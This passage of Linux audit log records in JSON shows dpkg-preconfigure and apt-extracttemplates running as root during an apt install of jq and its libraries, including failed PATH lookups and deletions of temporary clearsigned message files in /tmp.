"launch_time": 1632470477.541,
"ppid": 7611
}
}
{
"ID": "1632470477.545:422",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg-preconfigu",
"exe": "/usr/bin/perl",
"key": "rootcmd",
"ARGV": [
"0x7ffd72637ad0",
"0x5607cc892910",
"0x5607cbb47980",
"0x8"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/local/sbin/apt-extracttemplates",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.545:423",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg-preconfigu",
"exe": "/usr/bin/perl",
"key": "rootcmd",
"ARGV": [
"0x7ffd72637ad0",
"0x5607cc892910",
"0x5607cbb47980",
"0x8"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/local/bin/apt-extracttemplates",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.549:424",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg-preconfigu",
"exe": "/usr/bin/perl",
"key": "rootcmd",
"ARGV": [
"0x7ffd72637ad0",
"0x5607cc892910",
"0x5607cbb47980",
"0x8"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/apt-extracttemplates",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.549:425",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "rootcmd",
"ARGV": [
"0x7ffd72637ad0",
"0x5607cc892910",
"0x5607cbb47980",
"0x8"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"apt-extracttemplates",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/apt-extracttemplates",
"inode": 786903,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.553:426",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7618,
"pid": 7619,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x55fcd7bc0630",
"0x55fcd7bbf450",
"0x7fff6dae67c0",
"0x55fcd7b9f010"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt-extracttemplates",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.549,
"ppid": 7617
}
}
{
"ID": "1632470477.557:427",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.1hlq6f",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.561:428",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.AgRAeg",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.569:429",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.aHcJTd",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.573:430",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.FSyZuf",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.577:431",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.kiYzxf",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.585:432",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.xUGXaf",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.589:433",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.pQg4od",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.593:434",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.yAkldd",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.597:435",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.0ChbSf",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.601:436",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.eWOTng",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.605:437",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.AofZLg",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.605:438",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.7I2WMc",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.609:439",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.Ky9L1e",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.613:440",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.abtvFc",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
